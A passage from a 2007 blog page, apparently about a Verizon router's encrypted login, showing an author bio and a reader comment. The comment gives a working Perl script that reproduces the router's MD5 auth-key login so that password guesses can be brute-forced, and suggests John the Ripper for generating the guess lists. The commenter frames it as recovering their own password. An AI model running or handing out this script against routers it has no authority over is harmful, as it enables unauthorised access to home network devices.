«

»

About the author

Timothy Haroutunian

Timothy Haroutunian is a ServiceNow Cloud Implementation Specialist at Acorio. ServiceNow is an IT Management solution that allows for a complete view of your IT and physical environment.

Permanent link to this article: http://www.armenianeagle.com/2007/09/05/verizon-router-encrypted-login-revealed/

1 comment

  1. nebulous

    I did in fact need to crack my own password since I wanted to do some administration on the router and didn’t have physical access to it. So I wrote a little Perl script to check a bunch of permutations until login worked. Its not necessary to find out how the auth key is generated, only to know what the auth key is. The script downloads the login page, md5’s up the password along with the auth key, rearranges the form fields as the JavaScript would in a browser, and resubmits. I knew in general what my password was likely to be so I generated 50 or so guesses with varying case etc and ran the script against it. Sure enough, it worked and I have my password again. Heres the script *do NOT use this on someone else’s router or the big guys with guns might find their way to your door*

    first argument is the url to the login page (most likely http://192.168.1.1 and the second argument is the attempted password. You can use John the Ripper to generate you an enormous list of possible passwords if you’ve really forgotten your password that badly, but if so it’d be more appropriate just to hit the reset button on your box.

    #!/usr/bin/perl
    use LWP::UserAgent;
    use HTML::Form;
    use Digest::MD5 qw/md5_hex/;

    my $ua = new LWP::UserAgent;
    my $response = $ua->get($ARGV[0]);
    my $password = $ARGV[1];
    my @forms = HTML::Form->parse($response);
    foreach my $form (@forms) {
    my $fd = {};
    foreach my $input ($form->inputs) {
    $fd->{$input->name} = $input->value;
    }

    $fd->{user_name} = ‘admin’;
    $fd->{‘passwordmask_’.$fd->{session_id}} = $password;
    $fd->{passwd1} =~ s/./ /g;
    $fd->{md5_pass} = md5_hex($password.$fd->{auth_key});
    $fd->{mimic_button_field} = ‘submit_button_login_submit: ..’;

    my $response = $ua->post($form->action, $fd);
    print “Trying $password …”;
    print $response->content =~ /Login failed/s ? “Failed” : “Success!”;
    print “\n”;
    }

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.